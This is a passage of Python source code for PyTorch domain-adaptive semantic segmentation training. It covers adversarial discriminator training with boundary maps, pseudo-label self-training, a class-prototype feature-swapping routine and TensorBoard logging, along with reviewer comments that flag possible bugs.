        # Fuse class probabilities with the boundary channel.
        pred_trg_fusion = torch.cat((F.softmax(pred_trg_main, dim=1), pred_trg_boundary), dim=1)
        if adaptseg_on:
            d_out_main = d_main(pred_trg_fusion)
        else:
            # NOTE(review): prob_2_entropy is applied to the whole fusion,
            # including the boundary channel — assumes that channel already
            # lies in [0, 1]; confirm the boundary head emits probabilities.
            d_out_main = d_main(prob_2_entropy(pred_trg_fusion))
        loss_adv_trg_main = mse_loss(d_out_main, source_label)  # LSGAN-style objective
        loss = cfg.TRAIN.LAMBDA_ADV_MAIN * loss_adv_trg_main
        loss.backward()
        # --- discriminator step ---
        for param in d_main.parameters():
            param.requires_grad = True
        # train with source (detach: no gradient back into the generator)
        pred_src_main = pred_src_main.detach()
        pred_src_boundary = pred_src_boundary.detach()
        pred_src_fusion = torch.cat((F.softmax(pred_src_main, dim=1), pred_src_boundary), dim=1)
        if adaptseg_on:
            d_out_main = d_main(pred_src_fusion)
        else:
            d_out_main = d_main(prob_2_entropy(pred_src_fusion))
        loss_d_main = mse_loss(d_out_main, source_label) / 2
        loss_d_main.backward()
        # train with target
        pred_trg_main = pred_trg_main.detach()
        pred_trg_boundary = pred_trg_boundary.detach()
        pred_trg_fusion = torch.cat((F.softmax(pred_trg_main, dim=1), pred_trg_boundary), dim=1)
        if adaptseg_on:
            d_out_main = d_main(pred_trg_fusion)
        else:
            d_out_main = d_main(prob_2_entropy(pred_trg_fusion))
        loss_d_main = mse_loss(d_out_main, target_label) / 2
        loss_d_main.backward()
        optimizer.step()
        optimizer_d_main.step()
        current_losses = {
            'loss_seg_src_main': loss_seg_src_main,
            'loss_boundary_src_main': loss_boundary_src_main,
            'loss_adv_trg_main': loss_adv_trg_main,
            'loss_d_main': loss_d_main
        }
        print_losses(current_losses, i_iter)
        if i_iter % cfg.TRAIN.SAVE_PRED_EVERY == 0 and i_iter != 0:
            print('taking snapshot ...')
            print('exp =', cfg.TRAIN.SNAPSHOT_DIR)
            snapshot_dir = Path(cfg.TRAIN.SNAPSHOT_DIR)
            torch.save(model.state_dict(), snapshot_dir / f'model_{i_iter}.pth')
            torch.save(d_main.state_dict(), snapshot_dir / f'model_{i_iter}_D_main.pth')
            # Early stop is only evaluated on snapshot iterations (matches siblings).
            if i_iter >= cfg.TRAIN.EARLY_STOP - 1:
                break
        sys.stdout.flush()
        # Visualize with tensorboard
        if viz_tensorboard:
            log_losses_tensorboard(writer, current_losses, i_iter)
            if i_iter % cfg.TRAIN.TENSORBOARD_VIZRATE == cfg.TRAIN.TENSORBOARD_VIZRATE - 1:
                draw_in_tensorboard(writer, images, i_iter, pred_trg_main, num_classes, 'T', pred_trg_boundary)
                draw_in_tensorboard(writer, images_source, i_iter, pred_src_main, num_classes, 'S', pred_src_boundary)
# TODO: boundary and seg multi-adaptations
def train_Boundary_advent_vgg(model, trainloader, targetloader, cfg):
    """Adversarial UDA training (AdvEnt or AdaptSeg flavor) adapting BOTH the
    segmentation output and the auxiliary boundary map, each with its own
    discriminator (d_main over num_classes channels, d_boundary over 1).

    Args:
        model: network returning (mid_feature, seg_logits, boundary_logits).
        trainloader: source dataloader yielding
            (images, labels, _, weather_name, labels_things).
        targetloader: target dataloader yielding (images, _, _, _).
        cfg: experiment configuration (TRAIN.* hyper-parameters, GPU_ID, ...).
    """
    # DA_METHOD selects the discriminator input: plain maps (AdaptSeg)
    # vs. entropy maps (AdvEnt).
    adaptseg_on = (cfg.TRAIN.DA_METHOD == 'AdapSeg')
    input_size_source = cfg.TRAIN.INPUT_SIZE_SOURCE
    input_size_target = cfg.TRAIN.INPUT_SIZE_TARGET
    device = cfg.GPU_ID
    num_classes = cfg.NUM_CLASSES
    viz_tensorboard = os.path.exists(cfg.TRAIN.TENSORBOARD_LOGDIR)
    if viz_tensorboard:
        writer = SummaryWriter(log_dir=cfg.TRAIN.TENSORBOARD_LOGDIR)
    # SEGMENTATION NETWORK
    model.train()
    model.to(device)
    cudnn.benchmark = True
    cudnn.enabled = True
    # Output-level discriminator over softmaxed segmentation maps.
    d_main = get_fc_discriminator(num_classes=num_classes)
    d_main.train()
    d_main.to(device)
    # 1-channel discriminator over the boundary map.
    d_boundary = get_fc_discriminator(num_classes=1)
    d_boundary.train()
    d_boundary.to(device)
    # OPTIMIZERS
    # segnet's optimizer
    optimizer = optim.SGD(model.optim_parameters(cfg.TRAIN.LEARNING_RATE),
                          lr=cfg.TRAIN.LEARNING_RATE,
                          momentum=cfg.TRAIN.MOMENTUM,
                          weight_decay=cfg.TRAIN.WEIGHT_DECAY)
    # discriminators' optimizers
    optimizer_d_main = optim.Adam(d_main.parameters(), lr=cfg.TRAIN.LEARNING_RATE_D,
                                  betas=(0.9, 0.99))
    optimizer_d_boundary = optim.Adam(d_boundary.parameters(), lr=cfg.TRAIN.LEARNING_RATE_D,
                                      betas=(0.9, 0.99))
    # Upsample outputs to the (W, H) input size of each domain.
    interp = nn.Upsample(size=(input_size_source[1], input_size_source[0]), mode='bilinear',
                         align_corners=True)
    interp_target = nn.Upsample(size=(input_size_target[1], input_size_target[0]), mode='bilinear',
                                align_corners=True)
    # labels for adversarial training
    source_label = 0
    target_label = 1
    trainloader_iter = enumerate(trainloader)
    targetloader_iter = enumerate(targetloader)
    for i_iter in tqdm(range(cfg.TRAIN.EARLY_STOP + 1)):
        # reset optimizers and adapt LRs
        optimizer.zero_grad()
        optimizer_d_main.zero_grad()
        optimizer_d_boundary.zero_grad()
        adjust_learning_rate(optimizer, i_iter, cfg)
        adjust_learning_rate_discriminator(optimizer_d_main, i_iter, cfg)
        adjust_learning_rate_discriminator(optimizer_d_boundary, i_iter, cfg)
        # Generator step first: freeze both discriminators.
        for param in d_main.parameters():
            param.requires_grad = False
        for param in d_boundary.parameters():
            param.requires_grad = False
        _, batch = next(trainloader_iter)
        images_source, labels, _, weather_name, labels_things = batch
        mid_feature_src, pred_src_main, pred_src_boundary = model(images_source.cuda(device))
        # --- supervised source losses (boundary + segmentation) ---
        pred_src_boundary = interp(pred_src_boundary)
        loss_boundary_src_main, _ = boundary_loss_func(pred_src_boundary, labels, cfg.TRAIN.BOUNDARY_LOSS, cfg.TRAIN.LAMBDA_DICE)
        pred_src_main = interp(pred_src_main)
        loss_seg_src_main = loss_calc(pred_src_main, labels, device)
        loss = (cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_src_main +
                cfg.TRAIN.LAMBDA_BOUNDARY * loss_boundary_src_main)
        loss.backward()
        # --- adversarial (generator) step on target: make both discriminators
        # predict `source_label` for target outputs ---
        _, batch = next(targetloader_iter)
        images, _, _, _ = batch
        mid_feature_tgt, pred_trg_main, pred_trg_boundary = model(images.cuda(device))
        pred_trg_main = interp_target(pred_trg_main)
        pred_trg_boundary = interp_target(pred_trg_boundary)
        if adaptseg_on:
            d_out_main = d_main(F.softmax(pred_trg_main, dim=1))
            d_out_boundary = d_boundary(pred_trg_boundary)
        else:
            d_out_main = d_main(prob_2_entropy(F.softmax(pred_trg_main, dim=1)))
            # NOTE(review): prob_2_entropy is fed the raw boundary head output —
            # assumes it is already a probability in [0, 1]; confirm.
            d_out_boundary = d_boundary(prob_2_entropy(pred_trg_boundary))
        loss_adv_trg_main = mse_loss(d_out_main, source_label)  # LSGAN-style objective
        loss_adv_trg_boundary = mse_loss(d_out_boundary, source_label)
        loss = (cfg.TRAIN.LAMBDA_ADV_MAIN * loss_adv_trg_main +
                cfg.TRAIN.LAMBDA_ADV_BOUNDARY * loss_adv_trg_boundary)
        loss.backward()
        # --- discriminator step ---
        for param in d_main.parameters():
            param.requires_grad = True
        for param in d_boundary.parameters():
            param.requires_grad = True
        # train with source (detach: no gradient back into the generator)
        pred_src_main = pred_src_main.detach()
        pred_src_boundary = pred_src_boundary.detach()
        if adaptseg_on:
            d_out_main = d_main(F.softmax(pred_src_main, dim=1))
            d_out_boundary = d_boundary(pred_src_boundary)
        else:
            d_out_main = d_main(prob_2_entropy(F.softmax(pred_src_main, dim=1)))
            d_out_boundary = d_boundary(prob_2_entropy(pred_src_boundary))
        loss_d_boundary = mse_loss(d_out_boundary, source_label) / 2
        loss_d_boundary.backward()
        loss_d_main = mse_loss(d_out_main, source_label) / 2
        loss_d_main.backward()
        # train with target
        pred_trg_main = pred_trg_main.detach()
        pred_trg_boundary = pred_trg_boundary.detach()
        if adaptseg_on:
            d_out_main = d_main(F.softmax(pred_trg_main, dim=1))
            d_out_boundary = d_boundary(pred_trg_boundary)
        else:
            d_out_main = d_main(prob_2_entropy(F.softmax(pred_trg_main, dim=1)))
            d_out_boundary = d_boundary(prob_2_entropy(pred_trg_boundary))
        loss_d_boundary = mse_loss(d_out_boundary, target_label) / 2
        loss_d_boundary.backward()
        loss_d_main = mse_loss(d_out_main, target_label) / 2
        loss_d_main.backward()
        optimizer.step()
        optimizer_d_main.step()
        optimizer_d_boundary.step()
        current_losses = {
            'loss_seg_src_main': loss_seg_src_main,
            'loss_boundary_src_main': loss_boundary_src_main,
            'loss_adv_trg_main': loss_adv_trg_main,
            'loss_adv_trg_boundary': loss_adv_trg_boundary,
            'loss_d_main': loss_d_main,
            'loss_d_boundary': loss_d_boundary
        }
        print_losses(current_losses, i_iter)
        if i_iter % cfg.TRAIN.SAVE_PRED_EVERY == 0 and i_iter != 0:
            print('taking snapshot ...')
            print('exp =', cfg.TRAIN.SNAPSHOT_DIR)
            snapshot_dir = Path(cfg.TRAIN.SNAPSHOT_DIR)
            torch.save(model.state_dict(), snapshot_dir / f'model_{i_iter}.pth')
            torch.save(d_main.state_dict(), snapshot_dir / f'model_{i_iter}_D_main.pth')
            torch.save(d_boundary.state_dict(), snapshot_dir / f'model_{i_iter}_D_boundary.pth')
            # Early stop is only evaluated on snapshot iterations (matches siblings).
            if i_iter >= cfg.TRAIN.EARLY_STOP - 1:
                break
        sys.stdout.flush()
        # Visualize with tensorboard
        if viz_tensorboard:
            log_losses_tensorboard(writer, current_losses, i_iter)
            if i_iter % cfg.TRAIN.TENSORBOARD_VIZRATE == cfg.TRAIN.TENSORBOARD_VIZRATE - 1:
                draw_in_tensorboard(writer, images, i_iter, pred_trg_main, num_classes, 'T', pred_trg_boundary)
                draw_in_tensorboard(writer, images_source, i_iter, pred_src_main, num_classes, 'S', pred_src_boundary)
###########################################################################################
# TODO: Instance-wise Self-Training based on warm-up adversarially trained VGG
def train_IST_vgg(model, trainloader, targetloader, cfg):
    '''Instance-wise self-training (IST) UDA training for a VGG backbone.

    A frozen deep copy of the incoming model (``model_st``) produces
    target-domain predictions from which pseudo-labels are generated
    (``label_generator``); the live ``model`` is then optimized on
    (a) supervised source segmentation, (b) a regularized self-training loss
    on the target pseudo-labels, and (c) the same loss on domain-"swarped"
    target features. Iteration count follows ``len(targetloader)``.
    '''
    # Create the model and start the training.
    input_size_source = cfg.TRAIN.INPUT_SIZE_SOURCE
    input_size_target = cfg.TRAIN.INPUT_SIZE_TARGET
    device = cfg.GPU_ID
    num_classes = cfg.NUM_CLASSES
    # Log to tensorboard only if the log directory already exists.
    viz_tensorboard = os.path.exists(cfg.TRAIN.TENSORBOARD_LOGDIR)
    if viz_tensorboard:
        writer = SummaryWriter(log_dir=cfg.TRAIN.TENSORBOARD_LOGDIR)
    # SEGMNETATION NETWORK
    model.train()
    model.to(device)
    # pre-trained model for Self-Training: a frozen (eval-mode) copy used
    # only to generate pseudo-labels; it is never updated by the optimizer.
    model_st = deepcopy(model)
    model_st.eval()
    model_st.to(device)
    # target class-wise cutting threshold dictionary
    # (mutated/returned by DomainSwarping across iterations)
    target_cut_thresh = {}
    # per-class confidence thresholds; updated each iteration by label_generator
    cls_thresh = torch.ones(num_classes).type(torch.float32)
    cudnn.benchmark = True
    cudnn.enabled = True
    # OPTIMIZERS
    # segnet's optimizer
    optimizer = optim.SGD(model.optim_parameters(cfg.TRAIN.LEARNING_RATE),
                          lr=cfg.TRAIN.LEARNING_RATE,
                          momentum=cfg.TRAIN.MOMENTUM,
                          weight_decay=cfg.TRAIN.WEIGHT_DECAY)
    # interpolate output segmaps to each domain's (W, H) input size
    interp = nn.Upsample(size=(input_size_source[1], input_size_source[0]), mode='bilinear',
                         align_corners=True)
    interp_target = nn.Upsample(size=(input_size_target[1], input_size_target[0]), mode='bilinear',
                                align_corners=True)
    trainloader_iter = enumerate(trainloader)
    targetloader_iter = enumerate(targetloader)
    # Iteration follow the targetloader size
    total_iter = len(targetloader)
    for i_iter in tqdm(range(total_iter)):
        # reset optimizers
        optimizer.zero_grad()
        # adapt LR if needed
        adjust_learning_rate(optimizer, i_iter, cfg)
        # UDA Training
        # NOTE(review): this loader yields 4 items (no labels_things), unlike
        # the boundary variants' 5-item batches — confirm the dataset matches.
        _, batch = trainloader_iter.__next__()
        images_source, labels, _, weather_name = batch
        _, pred_src_main = model(images_source.cuda(device))
        ###########################
        # train on source for Seg #
        ###########################
        # Segmentation Training: standard supervised loss on source.
        pred_src_main = interp(pred_src_main)
        loss_seg_src_main = loss_calc(pred_src_main, labels, device)
        loss = cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_src_main
        loss.backward()
        ###################################
        #     Self-training generator     #
        ###################################
        ####### Target inference #######
        _, batch = targetloader_iter.__next__()
        # images, images_rev, _, _, name, name_next = batch # contrastive learning
        images, _, _, _ = batch
        feat_trg_main, pred_trg_main = model(images.cuda(device))
        pred_trg_main = interp_target(pred_trg_main)
        ####### Fixed model target inference #######
        # Frozen-copy forward pass; no gradients needed for pseudo-labeling.
        with torch.no_grad():
            feat_trg_main_st, pred_trg_main_st = model_st(images.cuda(device))
            pred_trg_main_st = interp_target(pred_trg_main_st)
        ####### pseudo label generator for target #######
        # cls_thresh is threaded through iterations so thresholds adapt over time.
        label_trg, cls_thresh = label_generator(pred_trg_main_st, cls_thresh, cfg, i_iter, total_iter)
        ##### CE loss for trg : Confidence Regularized Self-Training #######
        ####### MRKLD + Ign Region for target segmentation TODO: understanding this parts!!
        loss_seg_trg_main = reg_loss_calc_ign(pred_trg_main, label_trg, device)
        loss_tgt_seg = cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_trg_main
        ####### Domain Swarping #######
        # Mix swarped and original features: positions whose pseudo-label is
        # the ignore value (255) keep the original features.
        feat_trg_swarped, target_cut_thresh, target_label = DomainSwarping(feat_trg_main, label_trg, target_cut_thresh, device)
        ignore_mask = (target_label == 255)
        feat_trg_swarped = (~ignore_mask * feat_trg_swarped) + (ignore_mask * feat_trg_main)
        pred_trg_swarped = model.classifier_(feat_trg_swarped)
        pred_trg_swarped = interp_target(pred_trg_swarped)
        ###### MRKLD + ign loss for swarped target segmentation #######
        loss_seg_trg_swarped = reg_loss_calc_ign(pred_trg_swarped, label_trg, device)
        loss_tgt_seg_swarped = cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_trg_swarped
        loss_tgt = loss_tgt_seg + loss_tgt_seg_swarped
        loss_tgt.backward()
        optimizer.step()
        current_losses = {'loss_seg_trg_main': loss_seg_trg_main,
                          'loss_seg_src_main': loss_seg_src_main,
                          'loss_seg_trg_swarped': loss_seg_trg_swarped
                          }
        print_losses(current_losses, i_iter)
        if i_iter % cfg.TRAIN.SAVE_PRED_EVERY == 0 and i_iter != 0:
            print('taking snapshot ...')
            print('exp =', cfg.TRAIN.SNAPSHOT_DIR)
            snapshot_dir = Path(cfg.TRAIN.SNAPSHOT_DIR)
            torch.save(model.state_dict(), snapshot_dir / f'model_{i_iter}.pth')
            torch.save(model_st.state_dict(), snapshot_dir / f'model_{i_iter}_st.pth')
            # Early stop is only evaluated on snapshot iterations (matches siblings).
            if i_iter >= cfg.TRAIN.EARLY_STOP - 1:
                break
        sys.stdout.flush()
        # Visualize with tensorboard
        if viz_tensorboard:
            log_losses_tensorboard(writer, current_losses, i_iter)
            if i_iter % cfg.TRAIN.TENSORBOARD_VIZRATE == cfg.TRAIN.TENSORBOARD_VIZRATE - 1:
                # draw_in_tensorboard(writer, images_source, i_iter, pred_src_main, num_classes, 'S')
                st_draw_in_tensorboard_trans(writer, images, label_trg, i_iter, pred_trg_main, pred_trg_swarped, num_classes, 'T')
# TODO: Instance-wise Self-Training for boundary VGG
def train_Boundary_IST_vgg(model, trainloader, targetloader, cfg):
    '''
    UDA training with advent
    '''
    # Instance-wise self-training (IST) for a VGG backbone with an auxiliary
    # boundary head: supervised segmentation + boundary losses on source
    # images, and pseudo-label self-training (with domain-"swarped" features)
    # on target images. A frozen copy of the model generates pseudo labels.
    # Create the model and start the training.
    input_size_source = cfg.TRAIN.INPUT_SIZE_SOURCE
    input_size_target = cfg.TRAIN.INPUT_SIZE_TARGET
    device = cfg.GPU_ID
    num_classes = cfg.NUM_CLASSES
    viz_tensorboard = os.path.exists(cfg.TRAIN.TENSORBOARD_LOGDIR)
    if viz_tensorboard:
        writer = SummaryWriter(log_dir=cfg.TRAIN.TENSORBOARD_LOGDIR)
    # SEGMNETATION NETWORK
    model.train()
    model.to(device)
    # pre-trained model for Self-Training
    # (frozen snapshot used only for pseudo-label generation; never stepped)
    model_st = deepcopy(model)
    model_st.eval()
    model_st.to(device)
    # target class-wise cutting threshold dictionary
    target_cut_thresh = {}
    # running class-wise confidence thresholds for pseudo-label selection
    cls_thresh = torch.ones(num_classes).type(torch.float32)
    cudnn.benchmark = True
    cudnn.enabled = True
    # OPTIMIZERS
    # segnet's optimizer
    optimizer = optim.SGD(model.optim_parameters(cfg.TRAIN.LEARNING_RATE),
                          lr=cfg.TRAIN.LEARNING_RATE,
                          momentum=cfg.TRAIN.MOMENTUM,
                          weight_decay=cfg.TRAIN.WEIGHT_DECAY)
    # interpolate output segmaps
    interp = nn.Upsample(size=(input_size_source[1], input_size_source[0]), mode='bilinear',
                         align_corners=True)
    interp_target = nn.Upsample(size=(input_size_target[1], input_size_target[0]), mode='bilinear',
                                align_corners=True)
    trainloader_iter = enumerate(trainloader)
    targetloader_iter = enumerate(targetloader)
    # Iteration follow the targetloader size
    total_iter = len(targetloader)
    for i_iter in tqdm(range(total_iter)):
        # reset optimizers
        optimizer.zero_grad()
        # adapt LR if needed
        adjust_learning_rate(optimizer, i_iter, cfg)
        # UDA Training
        _, batch = trainloader_iter.__next__()
        images_source, labels, _, weather_name = batch
        # NOTE(review): this call unpacks 3 model outputs while the target-side
        # call below unpacks 4 — confirm the model's forward() signature.
        _, pred_src_main, pred_src_boundary = model(images_source.cuda(device))
        ###########################
        # train on source for Seg #
        ###########################
        # Boundary Training
        pred_src_boundary = interp(pred_src_boundary)
        loss_boundary_src_main, boundary_targets = boundary_loss_func(pred_src_boundary, labels, cfg.TRAIN.BOUNDARY_LOSS, cfg.TRAIN.LAMBDA_DICE)
        # Segmentation Training
        pred_src_main = interp(pred_src_main)
        loss_seg_src_main = loss_calc(pred_src_main, labels, device)
        loss = (cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_src_main +
                cfg.TRAIN.LAMBDA_BOUNDARY * loss_boundary_src_main)
        loss.backward()
        current_losses = {'loss_seg_src_main': loss_seg_src_main}
        # Record the boundary loss under a key naming the loss type and weight.
        if cfg.TRAIN.BOUNDARY_LOSS == "BCE":
            current_losses['loss_boundary_BCE_{}'.format(cfg.TRAIN.LAMBDA_BOUNDARY)] = loss_boundary_src_main
        elif cfg.TRAIN.BOUNDARY_LOSS == "DICE":
            current_losses['loss_boundary_DICE_{}'.format(cfg.TRAIN.LAMBDA_BOUNDARY)] = loss_boundary_src_main
        elif cfg.TRAIN.BOUNDARY_LOSS == "BCE+DICE":
            current_losses['loss_boundary_BCE+DICE_{}'.format(cfg.TRAIN.LAMBDA_BOUNDARY)] = loss_boundary_src_main
        else:
            raise NotImplementedError(f"Not yet supported {cfg.TRAIN.BOUNDARY_LOSS}")
        current_losses['loss_boundary_src_main'] = cfg.TRAIN.LAMBDA_BOUNDARY * loss_boundary_src_main
        ###################################
        # Self-training generator         #
        ###################################
        ####### Target inference #######
        _, batch = targetloader_iter.__next__()
        # images, images_rev, _, _, name, name_next = batch # contrastive learning
        images, _, _, _ = batch
        _, pred_trg_main, feat_trg_main, pred_trg_boundary = model(images.cuda(device))
        pred_trg_main = interp_target(pred_trg_main)
        pred_trg_boundary = interp_target(pred_trg_boundary)
        ####### Fixed model target inference #######
        with torch.no_grad():
            # NOTE(review): this rebinds pred_trg_boundary, discarding the
            # interpolated boundary prediction computed above; no target
            # boundary loss is taken either way — confirm this is intended.
            _, pred_trg_main_st, feat_trg_main_st, pred_trg_boundary = model_st(images.cuda(device))
            pred_trg_main_st = interp_target(pred_trg_main_st)
        ####### pseudo label generator for target #######
        label_trg, cls_thresh = label_generator(pred_trg_main_st, cls_thresh, cfg, i_iter, total_iter)
        ##### CE loss for target segmentation #######
        ####### MRKLD + Ign Region for target segmentation TODO: understanding this parts!!
        loss_seg_trg_main = reg_loss_calc_ign(pred_trg_main, label_trg, device)
        loss_tgt_seg = cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_trg_main
        ####### Domain Swarping #######
        feat_trg_swarped, target_cut_thresh, target_label = DomainSwarping(feat_trg_main, label_trg, target_cut_thresh, device)
        # Keep the original features wherever the pseudo label is ignore (255).
        ignore_mask = (target_label == 255)
        feat_trg_swarped = (~ignore_mask * feat_trg_swarped) + (ignore_mask * feat_trg_main)
        pred_trg_swarped = model.classifier_(feat_trg_swarped)
        pred_trg_swarped = interp_target(pred_trg_swarped)
        ###### MRKLD + ign loss for swarped target segmentation #######
        loss_seg_trg_swarped = reg_loss_calc_ign(pred_trg_swarped, label_trg, device)
        loss_tgt_seg_swarped = cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_trg_swarped
        loss_tgt = loss_tgt_seg + loss_tgt_seg_swarped
        loss_tgt.backward()
        optimizer.step()
        # NOTE(review): current_losses is rebound here, so the boundary-loss
        # entries collected above are dropped from logging — confirm intended.
        current_losses = {'loss_seg_trg_main': loss_seg_trg_main,
                          'loss_seg_src_main': loss_seg_src_main,
                          'loss_seg_trg_swarped': loss_seg_trg_swarped
                          }
        print_losses(current_losses, i_iter)
        if i_iter % cfg.TRAIN.SAVE_PRED_EVERY == 0 and i_iter != 0:
            print('taking snapshot ...')
            print('exp =', cfg.TRAIN.SNAPSHOT_DIR)
            snapshot_dir = Path(cfg.TRAIN.SNAPSHOT_DIR)
            torch.save(model.state_dict(), snapshot_dir / f'model_{i_iter}.pth')
            torch.save(model_st.state_dict(), snapshot_dir / f'model_{i_iter}_st.pth')
            if i_iter >= cfg.TRAIN.EARLY_STOP - 1:
                break
        sys.stdout.flush()
        # Visualize with tensorboard
        if viz_tensorboard:
            log_losses_tensorboard(writer, current_losses, i_iter)
            if i_iter % cfg.TRAIN.TENSORBOARD_VIZRATE == cfg.TRAIN.TENSORBOARD_VIZRATE - 1:
                draw_in_tensorboard(writer, images_source, i_iter, pred_src_main, num_classes, 'S', pred_src_boundary, boundary_targets)
                # draw_in_tensorboard(writer, images, label_trg, i_iter, pred_trg_main, pred_tgt_swarped, num_classes, 'T')
###########################################################################################
def label_generator(pred_trg, cls_thresh_tot, cfg, i_iter, tot_iter):
    """Generate pseudo labels for target predictions (CBST/IAST-style).

    For each class, the most confident ~``20% * sqrt(1 - i_iter/(tot_iter+1))``
    of the pixels predicted as that class define a confidence threshold.
    The running thresholds ``cls_thresh_tot`` are then updated with a 0.9/0.1
    EMA, and every pixel whose threshold-normalized probability stays below 1
    is marked with the ignore index 255.

    Args:
        pred_trg: raw (pre-softmax) segmentation logits, shape (N, C, H, W).
        cls_thresh_tot: running per-class thresholds, shape (C,); entries
            still equal to 1.0 are treated as "never set".
        cfg: config providing GPU_ID and NUM_CLASSES.
        i_iter, tot_iter: current / total iteration, controlling the decay of
            the selection ratio.

    Returns:
        (uint8 pseudo-label map with 255 = ignore, updated threshold tensor)
    """
    import math
    device = cfg.GPU_ID
    output_main = F.softmax(pred_trg, dim=1)
    amax_output = torch.argmax(output_main, dim=1).type(torch.uint8)
    pred_label = amax_output.clone()
    conf, _ = torch.max(output_main, dim=1)
    # Subsampled per-class confidence samples of the pixels predicted as each class.
    conf_dict = {k: [] for k in range(cfg.NUM_CLASSES)}
    pred_cls_num = torch.zeros(cfg.NUM_CLASSES)
    for idx_cls in range(cfg.NUM_CLASSES):
        idx_temp = pred_label == idx_cls
        pred_cls_num[idx_cls] = pred_cls_num[idx_cls] + torch.sum(idx_temp)
        if idx_temp.any():
            conf_cls_temp = conf[idx_temp].type(torch.float32)
            # Keep only every 16th value to bound the sorting cost below.
            conf_dict[idx_cls].extend(conf_cls_temp[0:len(conf_cls_temp):16])
    cls_thresh = torch.ones(cfg.NUM_CLASSES).type(torch.float32)
    cls_sel_size = torch.zeros(cfg.NUM_CLASSES).type(torch.float32)
    for idx_cls in range(cfg.NUM_CLASSES):
        if conf_dict[idx_cls] is not None:
            conf_dict[idx_cls], _ = torch.sort(torch.FloatTensor(conf_dict[idx_cls]), descending=True)
            len_cls = len(conf_dict[idx_cls])
            # Selection ratio decays from 0.2 towards 0 over training.
            iter_ratio = 1.0 - float(i_iter / (tot_iter + 1))
            coeff = 0.2 * (iter_ratio ** 0.5)
            cls_sel_size[idx_cls] = int(math.floor(len_cls * coeff))
            len_cls_thresh = int(cls_sel_size[idx_cls])
            if len_cls_thresh != 0:
                # Threshold = confidence of the last selected (least confident) pixel.
                cls_thresh[idx_cls] = conf_dict[idx_cls][len_cls_thresh - 1]
            conf_dict[idx_cls] = None  # release the sorted buffer
    # EMA update of the running thresholds. Classes whose running threshold is
    # still the initial 1.0 take the fresh value directly; classes with no
    # fresh value (cls_thresh == 1.0) keep their running value unchanged.
    cls_thresh_tot_ = torch.where(cls_thresh_tot == 1.0, cls_thresh, 0.9 * cls_thresh_tot + 0.1 * cls_thresh)
    cls_thresh_mask = (cls_thresh == 1.0) * (cls_thresh_tot != 1.0)
    cls_thresh_tot = torch.where(cls_thresh_mask, cls_thresh_tot, cls_thresh_tot_)
    # Normalize probabilities by the class thresholds; pixels whose best
    # normalized probability is still below 1 get the ignore index 255.
    weighted_prob = output_main / cls_thresh_tot.to(device).unsqueeze(0).unsqueeze(2).unsqueeze(3)
    weighted_pred_trainIDs = torch.argmax(weighted_prob, dim=1).type(torch.uint8)
    weighted_conf, _ = torch.max(weighted_prob, dim=1)
    weighted_pred_trainIDs[weighted_conf < 1] = 255
    return weighted_pred_trainIDs, cls_thresh_tot
def DomainSwarping(tgt_feat_warped_cat, tgt_label, tgt_dict_tot, device):
    """Replace target features by running class-wise prototypes ("swarping").

    For every class present in the (pseudo) label map, the class's region in
    the feature map is filled with the stored class prototype; the prototype
    is then EMA-updated (random alpha in {0.1, ..., 0.9}) with the current
    masked-average feature and detached from the autograd graph.

    Args:
        tgt_feat_warped_cat: target feature map, shape (1, C, h, w).
        tgt_label: pseudo-label map (255 = ignore), spatial size is
            downsampled to (h, w) with nearest-neighbour interpolation.
        tgt_dict_tot: dict of running per-class prototypes; mutated in place.
        device: unused here, kept for interface compatibility with callers.

    Returns:
        (prototype-filled feature map — 0 if every pixel is ignore,
         updated prototype dict, downsampled long label map)
    """
    # Randomly chosen EMA factor for the prototype update below.
    alpha = random.choice([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9])
    # Downsample the label map to the feature resolution.
    tgt_label = F.interpolate(tgt_label.unsqueeze(0).float(),
                              (tgt_feat_warped_cat.size(2), tgt_feat_warped_cat.size(3)),
                              mode='nearest')
    tgt_label = tgt_label.long()
    pool = nn.AdaptiveAvgPool2d(1)
    swarped_feat = 0  # accumulates prototype-filled regions
    for label_ele in torch.unique(tgt_label).tolist():
        if label_ele == 255:  # skip the ignore index
            continue
        cls_mask = tgt_label == label_ele
        # Masked class-average feature: pooled mean rescaled by the mask ratio.
        masked_tgt = cls_mask * tgt_feat_warped_cat
        avg_masked_tgt = pool(masked_tgt) * (cls_mask.size(2) * cls_mask.size(3) / cls_mask.sum())
        if label_ele not in tgt_dict_tot:
            print('new class info inserted')
            tgt_dict_tot[label_ele] = avg_masked_tgt
        # Paste the (pre-update) stored prototype into this class's region.
        swarped_feat += cls_mask * tgt_dict_tot[label_ele]
        # EMA-update the running prototype; detach so it carries no gradient.
        tgt_dict_tot[label_ele] = (alpha * tgt_dict_tot[label_ele] + (1 - alpha) * avg_masked_tgt).detach()
    return swarped_feat, tgt_dict_tot, tgt_label
def draw_in_tensorboard(writer, images, i_iter, pred_main, num_classes, type_, pred_src_boundary=None, boundary_targets=None):
    """Log an image grid, the colorized hard prediction, the per-pixel entropy
    map, and (optionally) the boundary prediction/ground truth to TensorBoard.

    type_ tags the images, e.g. 'S' for source and 'T' for target.
    """
    grid_image = make_grid(images[:3].clone().cpu().data, 3, normalize=True)
    writer.add_image(f'Image - {type_}', grid_image, i_iter)
    # Colorized argmax prediction of the first sample in the batch.
    # NOTE(review): F.softmax without dim= is deprecated; dim=1 presumably intended.
    grid_image = make_grid(torch.from_numpy(np.array(colorize_mask(np.asarray(
        np.argmax(F.softmax(pred_main).cpu().data[0].numpy().transpose(1, 2, 0),
                  axis=2), dtype=np.uint8)).convert('RGB')).transpose(2, 0, 1)), 3,
        normalize=False, range=(0, 255))
    writer.add_image(f'Prediction - {type_}', grid_image, i_iter)
    # Per-pixel prediction entropy (bits), normalized to [0, log2(num_classes)].
    output_sm = F.softmax(pred_main).cpu().data[0].numpy().transpose(1, 2, 0)
    output_ent = np.sum(-np.multiply(output_sm, np.log2(output_sm)), axis=2,
                        keepdims=False)
    grid_image = make_grid(torch.from_numpy(output_ent), 3, normalize=True,
                           range=(0, np.log2(num_classes)))
    writer.add_image(f'Entropy - {type_}', grid_image, i_iter)
    if pred_src_boundary is not None:
        # pred_src_boundary[pred_src_boundary >= 0.5] = 1
        # pred_src_boundary[pred_src_boundary < 0.5] = 0
